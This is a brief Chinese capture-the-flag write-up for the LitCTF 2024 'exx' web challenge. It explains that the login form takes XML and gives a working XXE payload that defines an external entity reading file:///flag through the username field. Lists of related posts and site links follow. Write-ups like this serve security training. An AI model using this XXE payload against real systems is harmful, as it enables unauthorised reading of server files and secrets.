NSS [LitCTF 2024]exx

编程语言 2024-11-06 19:41:52 阅读次数: 0

NSS [LitCTF 2024]exx

开题，是个登陆界面

抓包看看，xml格式，猜测是XXE。

直接最简单的payload打通了

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
  <!ENTITY xxe SYSTEM "file:///flag">     
]>
<user><username>
&xxe;                                                    
</username><password>123456</password></user>

猜你喜欢

转载自blog.csdn.net/Jayjay___/article/details/140598898

NSS [LitCTF 2024]exx

LitCTF 2024 web&misc wp

LITCTF 2024 Web方向题解WirteUp

LitCTF2023-wp

LitCTF2023 Reverse 题解及复现

LitCTF 2023 misc&web wp

从getaddrinfo看Glibc的nss

交叉编译nss

NSS [NISACTF 2022]is secret

NSS [NISACTF 2022]middlerce

NSS [NISACTF 2022]bingdundun~

NSS [MoeCTF 2021]2048

NSS [SDCTF 2022]Apollo 1337

NSS [羊城杯 2020]easyser

NSS_VersionCheck("3.26") failed. NSS >= 3.26 is required. Please upgrade to the latest NSS

STM32 SPI 的NSS引脚问题

STM32 SPI NSS大揭秘

ubuntu上安装chrome,及其NSS问题

yum Failed to initialize NSS library恢复

sqlzoo第八+关 NSS Tutorial

linux交叉编译nss3,nspr

SPI的NSS 脉冲模式的作用

关于SPI通信协议的NSS

NSS [HXPCTF 2021]includer‘s revenge

NSS [CISCN 2019初赛]Love Math

NSS [HUBUCTF 2022 新生赛]checkin

NSS [鹏城杯 2022]压缩包

NSS [鹤城杯 2021]EasyP

NSS [鹤城杯 2021]Middle magic

NSS [HUBUCTF 2022 新生赛]Calculate

今日推荐

周排行

阿里云服务器ECS开放8080端口

求正弦和余弦

链表倒数第n个节点

vue.js入门（13）实战demo

Java学习——day 15

My First Day in CSDN

Oracle11g 密码延迟认证导致library cache lock的情况分析

SAP ALV输出字段内容前增加空格

CloudFlare 推出免费 VPN 服务「Warp」，你懂的！

BUG(跑SLAM14-ch10)

每日归档

2025-03-16(0)

2025-03-15(0)

2025-03-14(0)

2025-03-13(0)

2025-03-12(0)

2025-03-11(0)

2025-03-10(0)

2025-03-09(0)

2025-03-08(0)

2025-03-07(0)